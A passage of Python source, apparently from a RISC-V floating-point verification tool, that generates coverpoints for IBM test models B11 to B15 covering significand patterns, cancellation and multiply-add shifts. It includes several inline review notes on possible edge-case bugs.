                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Leading ones ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Leading ones ---> rs1_man = '+rs2_man)
                    rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j)  # Trailing 0s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Trailing zeroes ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Trailing zeroes ---> rs1_man = '+rs2_man)
                    rs2_man = '0'*j + '1'*(len(rs1_man)-j)  # Trailing 1s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Trailing ones ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Trailing ones ---> rs1_man = '+rs2_man)
                for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
                    rs2_sgn = rs1_sgn
                    rs2_exp = rs1_exp
                    rs2_man = '1'*j + '0'*(len(rs1_man)-j)  # Long sequence of 1s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Long sequence of ones ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Long sequence of ones ---> rs1_man = '+rs2_man)
                    rs2_man = '0'*j + '1'*(len(rs1_man)-j)  # Long sequence of 0s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
                chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
                for j in chkrbrd:
                    rs2_sgn = rs1_sgn
                    rs2_exp = rs1_exp
                    rs2_man = j
                    for k in range(math.ceil(len(rs1_man)/len(j))):
                        rs2_man += j
                    rs2_man = rs2_man[0:flen-e_sz-1]
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Checkerboard pattern ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Checkerboard pattern ---> rs1_man = '+rs2_man)
    # Format each operand pair into a coverpoint string (fields + rm + comment).
    coverpoints = []
    k = 0
    for c in b11_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment[k]
        coverpoints.append(cvpt)
        k += 1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B11 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b12(flen, opcode, ops, seed=-1):
    '''
    IBM Model B12 Definition:
        This model tests every possible value for cancellation.
        For the difference between the exponent of the intermediate result and the
        maximum between the exponents of the inputs, test all values in the range:
        [-p, +1].

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Intermediate Result - Operand.Exp ∈ [-p, +1]
        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - rs1 is drawn at random with a sign chosen so that the operation cancels,
          an intermediate result `ir` is drawn, and rs2 is back-solved so that
          rs1 {op} rs2 == ir.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode 0 for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 40  # enough Decimal digits for exact flen==64 back-solving
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.000001p-126'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
    elif flen == 64:
        ieee754_maxnorm = '0x1.fffffffffffffp+1023'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.0000000000001p-1022'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
    # (unused `maxsubnorm` locals removed)
    # Deterministic per-opcode seeding keeps generated coverpoints reproducible.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
    else:
        random.seed(seed)
    b12_comb = []
    for i in range(50):
        # rs1's sign is chosen so rs1 {op} rs2 cancels towards ir.
        if opcode in 'fadd': rs1 = -1*random.uniform(minsubnorm, maxnum)
        elif opcode in 'fsub': rs1 = random.uniform(minsubnorm, maxnum)
        ir = random.uniform(1, maxnum)
        # Back-solve rs2 so that the operation yields ir; Decimal keeps the
        # flen==64 subtraction exact.
        if opcode in 'fadd':
            if flen == 32:
                rs2 = ir - rs1
            elif flen == 64:
                rs2 = Decimal(ir) - Decimal(rs1)
        elif opcode in 'fsub':
            if flen == 32:
                rs2 = rs1 - ir
            elif flen == 64:
                rs2 = Decimal(rs1) - Decimal(ir)
        # BUGFIX: dead `struct.pack('f', ...)` round-trips were removed here.
        # They were never read, and for flen==32 fadd the back-solved rs2 can
        # exceed float32 range, making struct.pack raise OverflowError.
        if opcode in ['fadd','fsub']:
            b12_comb.append((floatingPoint_tohex(flen, float(rs1)), floatingPoint_tohex(flen, float(rs2))))
    coverpoints = []
    comment = ' | Add: Cancellation'
    for c in b12_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen, c[x-1], str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        # Consistency fix: iterate up to ops like the sibling models instead of
        # the hard-coded range(1, 3) (identical for the ops == 2 callers).
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment
        coverpoints.append(cvpt)
    mess = 'Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B12 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b13(flen, opcode, ops, seed=-1):
    '''
    IBM Model B13 Definition:
        This model tests all combinations of cancellation values as in model (B12), with
        all possible unbiased exponent values of subnormal results.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Intermediate Result - Operand.Exp ∈ [-p, +1] (The exponent for the intermediate result is chosen such that it is a subnormal number)
        Operand1 {operation} Operand2 = Intermediate Results

    Implementation:
        - The implementation procedure for Model B12 is repeated with the
          intermediate result drawn from the subnormal range.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode 0 for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    getcontext().prec = 40  # enough Decimal digits for exact flen==64 back-solving
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.000001p-126'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
        ieee754_maxsubnorm = '0x0.7fffffp-126'
        maxsubnorm = float.fromhex(ieee754_maxsubnorm)
    elif flen == 64:
        ieee754_maxnorm = '0x1.fffffffffffffp+1023'
        maxnum = float.fromhex(ieee754_maxnorm)
        ieee754_minsubnorm = '0x0.0000000000001p-1022'
        minsubnorm = float.fromhex(ieee754_minsubnorm)
        ieee754_maxsubnorm = '0x0.fffffffffffffp-1022'
        maxsubnorm = float.fromhex(ieee754_maxsubnorm)
    # Deterministic per-opcode seeding keeps generated coverpoints reproducible.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
    else:
        random.seed(seed)
    b13_comb = []
    for i in range(200):
        rs1 = random.uniform(minsubnorm, maxnum)
        # The intermediate result is forced into the subnormal range.
        ir = random.uniform(minsubnorm, maxsubnorm)
        # Back-solve rs2 so rs1 {op} rs2 == ir; Decimal keeps flen==64 exact.
        if opcode in 'fadd':
            if flen == 32:
                rs2 = ir - rs1
            elif flen == 64:
                rs2 = Decimal(ir) - Decimal(rs1)
        elif opcode in 'fsub':
            if flen == 32:
                rs2 = rs1 - ir
            elif flen == 64:
                rs2 = Decimal(rs1) - Decimal(ir)
        # (dead `struct.pack('f', ...)` round-trips removed -- values unused)
        if opcode in ['fadd','fsub']:
            b13_comb.append((floatingPoint_tohex(flen, float(rs1)), floatingPoint_tohex(flen, float(rs2))))
    coverpoints = []
    comment = ' | Add: Cancellation ---> Subnormal result'
    for c in b13_comb:
        cvpt = ""
        # Consistency fix: iterate up to ops like the sibling models instead of
        # the hard-coded range(1, 3) (identical for the ops == 2 callers).
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen, c[x-1], str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment
        coverpoints.append(cvpt)
    mess = 'Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B13 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b14(flen, opcode, ops, N=-1, seed=-1):
    '''
    IBM Model B14 Definition:
        This model tests every possible value for a shift between the addends of the multiply-add operation.
        For the difference between the unbiased exponent of the addend and the
        unbiased exponent of the result of the multiplication, test the following values:
            1. A value smaller than -(2* p + 1)
            2. All the values in the range [-(2*p +1), (p +1) ]
            3. A value larger than (p + 1)
        We test both effective operations: addition and subtraction. The end values tested are selected to be greater by one than the largest possible shift in which
        the smaller addend may affect the result.

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param N: No. of sets of coverpoints to be generated. (Predefined to -1. Set to 2)
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type N: int
    :type seed: int

    Abstract Dataset Description:
        Shift between the addends of the multiply-add operation = [ A value smaller than -(2* p + 1), All the values in the range [-(2*p +1), (p +1), A value larger than (p + 1) ] → Condition 1
        Operand 1, 2 = Random
        Operand 3 = Condition 1

    Implementation:
        - The shift between the two addends are constrained by the conditions mentioned in the dataset above.
        - Operands 1 and 2 are randomly obtained. But Operand 3 is obtained by ensuring the shift conditions.
        - Once the dataset is formed, these operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode '0' for that particular opcode.
    '''
    # Drop the precision suffix (e.g. 'fmadd.s' -> 'fmadd').
    opcode = opcode.split('.')[0]
    # Precision-dependent constants: exp_max bounds the unbiased exponent
    # range, mant_bits is the significand width p, and limnum caps the random
    # operand draws. For flen == 64 the cap is 2**508 (ieee754_limnum) so a
    # product rs1*rs2 stays finite.
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        exp_max = 127
        mant_bits = 23
        limnum = maxnum
    elif flen == 64:
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        exp_max = 1022
        ieee754_limnum = '0x1.fffffffffffffp+507'
        mant_bits = 52
        limnum = float.fromhex(ieee754_limnum)
    if N == -1:
        N = 2
    # Deterministic per-opcode default seeds keep regenerated coverpoints stable.
    if seed == -1:
        if opcode in 'fmadd':
            random.seed(0)
        elif opcode in 'fmsub':
            random.seed(1)
        elif opcode in 'fnmadd':
            random.seed(2)
        elif opcode in 'fnmsub':
            random.seed(3)
    else:
        random.seed(seed)
    b14_comb = []
    comment = []
    for i in range(1,N):
        # Random multiplicands (rs1, rs2) and a base addend mantissa (rs3)
        # whose exponent is then rewritten to realize each shift regime.
        rs1 = random.uniform(1,limnum)
        rs2 = random.uniform(1,limnum)
        rs3 = random.uniform(1,limnum)
        # NOTE(review): this assumes repr(rs1*rs2) contains an 'e' exponent;
        # products whose repr has no 'e' part would raise IndexError — confirm
        # the operand ranges guarantee scientific notation here.
        mul_exp = int(str(rs1*rs2).split('e')[1])
        # NOTE(review): log10(2**mul_exp) scales the decimal exponent by
        # log10(2); verify this is the intended decimal->binary conversion
        # direction (the inverse would divide by log10(2)).
        mul_exp = int(math.log(pow(2,int(mul_exp)),10))
        # Case 1: shift smaller than -(2*p + 1) — only reachable when the
        # product exponent leaves room above the minimum exponent.
        if mul_exp-((2*mant_bits)+1) > -1*exp_max:
            rs3_exp = random.randrange(-1*exp_max,mul_exp-((2*mant_bits)+1))
            # Rebuild rs3 keeping its hex significand but substituting the
            # chosen binary exponent (string surgery on float.hex()).
            rs3_num = float.hex(float(str(rs3).split('e')[0])).split('p')[0]+'p'+str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp)
            rs3_num = float.fromhex(rs3_num)
            b14_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3_num))))
            comment.append(' | Multiplicand Exponent = '+str(mul_exp)+', Addend exponent = '+ str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp) + ' --> Difference smaller than -(2*p + 1)')
        # Case 2: every shift in [-(2*p + 1), p + 1], clamped to the legal
        # exponent range of the format.
        if mul_exp-((2*mant_bits)+1) < -1*exp_max: exp1 = -1*exp_max
        else: exp1 = mul_exp-((2*mant_bits)+1)
        if mul_exp+mant_bits+1 > exp_max: exp2 = exp_max
        else: exp2 = mul_exp+mant_bits+1
        for j in range(exp1, exp2):
            rs3_num = float.hex(float(str(rs3).split('e')[0])).split('p')[0]+'p'+str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+j)
            rs3_num = float.fromhex(rs3_num)
            b14_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3_num))))
            comment.append(' | Multiplicand Exponent = '+str(mul_exp)+', Addend exponent = '+ str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+j) + ' --> Values in the range [-(2*p + 1) , (p + 1)]')
        # Case 3: a shift larger than (p + 1).
        # NOTE(review): if exp2 == exp_max this randrange is empty and raises
        # ValueError — confirm exp2 < exp_max always holds for the inputs used.
        rs3_exp = random.randrange(exp2, exp_max)
        rs3_num = float.hex(float(str(rs3).split('e')[0])).split('p')[0]+'p'+str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp)
        rs3_num = float.fromhex(rs3_num)
        b14_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2)),floatingPoint_tohex(flen,float(rs3_num))))
        comment.append(' | Multiplicand Exponent = '+str(mul_exp)+', Addend exponent = '+ str(int(float.hex(float(str(rs3).split('e')[0])).split('p')[1])+rs3_exp) + ' --> A value larger than (p + 1)')
    # Render each operand triple as per-field coverpoint constraints plus a
    # human-readable trailing comment.
    coverpoints = []
    k = 0
    for c in b14_comb:
        cvpt = ""
        # NOTE(review): this loop hard-codes 3 operands (range(1, 4)) while
        # the comment loop below compares y against the ops parameter —
        # consistent only when ops == 3.
        for x in range(1, 4):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, 4):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment[k]
        coverpoints.append(cvpt)
        k += 1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B14 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b15(flen, opcode, ops, N=-1, seed=-1):
    '''
    IBM Model B15 Definition:
        In this model we test the combination of different shift values between the
        addends, with special patterns in the significands of the addends.
        For the significand of the addend and for the multiplication result we take the
        cases defined in model (B9) "Special Significands on Inputs"
        For the shift we take the cases defined in model (B14) "Shift – multiply-add".

    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)

    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int

    Abstract Dataset Description:
        Operand 1, 2 = Random
        Operand 3 ∈ Abstract Dataset in B9 + Abstract Dataset in B14

    Implementation:
        - Here the condition is imposed that if the value of the ops variable is 3, then each of the elements in the flip types is iterated and split into their respective sign, mantissa and exponent part.
        - A mul variable is initialized and parsed to the field_dec_converter for each rs1 value in the list. Next the loop is run for the mantissa parts generated for rs1 values, where it is checked for certain patterns like the leading 0's, leading 1's, trailing 0's and trailing 1's.
        - The checkerboard list is declared with the probable sequences for rs2. Here the sign and exponent are extracted from the rs1 values. Mantissa part is derived from the checkerboard list. Consecutively, if the flen value differs, then the range available varies.
        - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode '0' for that particular opcode.
    '''
    # NOTE(review): the N parameter is accepted (API symmetry with B14) but is
    # never used in this body.
    opcode = opcode.split('.')[0]
    # Precision-dependent constants. flip_types is the B9 special-value pool
    # (zeros, ones, min/max subnormal, min/max normal) in hex-string form.
    # NOTE(review): exp_max is assigned twice in each branch; the second
    # assignment (127 / 1022) is the one that takes effect.
    if flen == 32:
        flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
        e_sz=8
        exp_max = 255
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        exp_max = 127
        mant_bits = 23
        limnum = maxnum
    elif flen == 64:
        flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
        e_sz=11
        exp_max = 1023
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        exp_max = 1022
        ieee754_limnum = '0x1.fffffffffffffp+507'
        mant_bits = 52
        limnum = float.fromhex(ieee754_limnum)
    # Deterministic per-opcode default seeds keep regenerated coverpoints stable.
    if seed == -1:
        if opcode in 'fmadd':
            random.seed(0)
        elif opcode in 'fnmadd':
            random.seed(1)
        elif opcode in 'fmsub':
            random.seed(2)
        elif opcode in 'fnmsub':
            random.seed(3)
    else:
        random.seed(seed)
    rs1 = []
    b15_comb = []
    comment = []
    # Only the 3-operand (multiply-add family) case is modeled.
    if ops == 3:
        for i in range(len(flip_types)):
            rs1.append(flip_types[i])
        for i in range(len(rs1)):
            # Decompose the special value into sign / exponent / mantissa bit
            # strings ('1' prefix trick preserves leading zero bits).
            bin_val = bin(int('1'+rs1[i][2:],16))[3:]
            rs1_sgn = bin_val[0]
            rs1_exp = bin_val[1:e_sz+1]
            rs1_man = bin_val[e_sz+1:]
            # --- Region 1: addend exponent far BELOW the product exponent ---
            # (shift difference smaller than -(2p + 1)).
            if flen == 32:
                if int(rs1_exp,2) < 65: rs2_exp = 0
                else : rs2_exp = random.randrange(0,int(rs1_exp,2)-65)
                comment_str = ' | Exponent = '+ str(rs2_exp-127) + ' --> Difference smaller than -(2p + 1)'
                rs2_exp = '{:08b}'.format(rs2_exp)
            elif flen == 64:
                if int(rs1_exp,2) < 129: rs2_exp = 0
                else : rs2_exp = random.randrange(0,int(rs1_exp,2)-129)
                comment_str = ' | Exponent = '+ str(rs2_exp-1023) + ' --> Difference smaller than -(2p + 1)'
                rs2_exp = '{:011b}'.format(rs2_exp)
            # Split the special value (the target product) into two random
            # multiplicands: rs1_act * rs2_act == mul.
            mul = fields_dec_converter(flen,rs1[i])
            rs1_act = random.uniform(1,limnum)
            rs2_act = mul/rs1_act
            # B9 significand patterns for the addend. NOTE(review): the rs2_*
            # locals here describe operand 3 (the addend slot of the tuple),
            # as the generated comments ("rs3_man") indicate.
            for j in range(len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_man = '0'*j + rs1_man[j:]                   # Leading 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Leading zeroes ---> rs3_man = '+rs2_man)
                rs2_man = '1'*j + '0'*(len(rs1_man)-j)          # Leading 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Leading ones ---> rs3_man = '+rs2_man)
                rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j)   # Trailing 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Trailing zeroes ---> rs3_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j)          # Trailing 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Trailing ones ---> rs3_man = '+rs2_man)
            # Long runs of ones/zeroes covering the top ~10% split positions.
            # NOTE(review): rs2_exp is overridden with rs1_exp here, so these
            # cases no longer use the shifted exponent described in comment_str.
            for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = '1'*j + '0'*(len(rs1_man)-j)          # Long sequence of 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Long sequence of ones ---> rs3_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j)          # Long sequence of 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Long sequence of zeroes ---> rs3_man = '+rs2_man)
            # Checkerboard mantissa patterns, tiled then truncated to width.
            chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
            for j in chkrbrd:
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = j
                for k in range(math.ceil(len(rs1_man)/len(j))):
                    rs2_man += j
                rs2_man = rs2_man[0:flen-e_sz-1]
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Checkerboard pattern ---> rs3_man = '+rs2_man)
            # --- Region 2: addend exponent far ABOVE the product exponent ---
            # (shift difference greater than (p + 1)). Same pattern battery.
            if flen == 32:
                if int(rs1_exp,2) > 222: rs2_exp = 255
                else : rs2_exp = random.randrange(int(rs1_exp,2)+33, 255)
                comment_str = ' | Exponent = '+ str(rs2_exp-127) + ' --> Difference greater than (p + 1)'
                rs2_exp = '{:08b}'.format(rs2_exp)
            elif flen == 64:
                if int(rs1_exp,2) > 958: rs2_exp = 1023
                else : rs2_exp = random.randrange(int(rs1_exp,2)+65, 1023)
                comment_str = ' | Exponent = '+ str(rs2_exp-1023) + ' --> Difference greater than (p + 1)'
                rs2_exp = '{:011b}'.format(rs2_exp)
            mul = fields_dec_converter(flen,rs1[i])
            rs1_act = random.uniform(1,limnum)
            rs2_act = mul/rs1_act
            for j in range(len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_man = '0'*j + rs1_man[j:]                   # Leading 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Leading zeroes ---> rs3_man = '+rs2_man)
                rs2_man = '1'*j + '0'*(len(rs1_man)-j)          # Leading 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Leading ones ---> rs3_man = '+rs2_man)
                rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j)   # Trailing 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Trailing zeroes ---> rs3_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j)          # Trailing 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Trailing ones ---> rs3_man = '+rs2_man)
            for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = '1'*j + '0'*(len(rs1_man)-j)          # Long sequence of 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
                comment.append(comment_str + ' | Long sequence of ones ---> rs3_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j)          # Long sequence of 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b15_comb.append((floatingPoint_tohex(flen,float(rs1_act)),floatingPoint_tohex(flen,float(rs2_act)),floatingPoint_tohex(flen,float(rs2))))
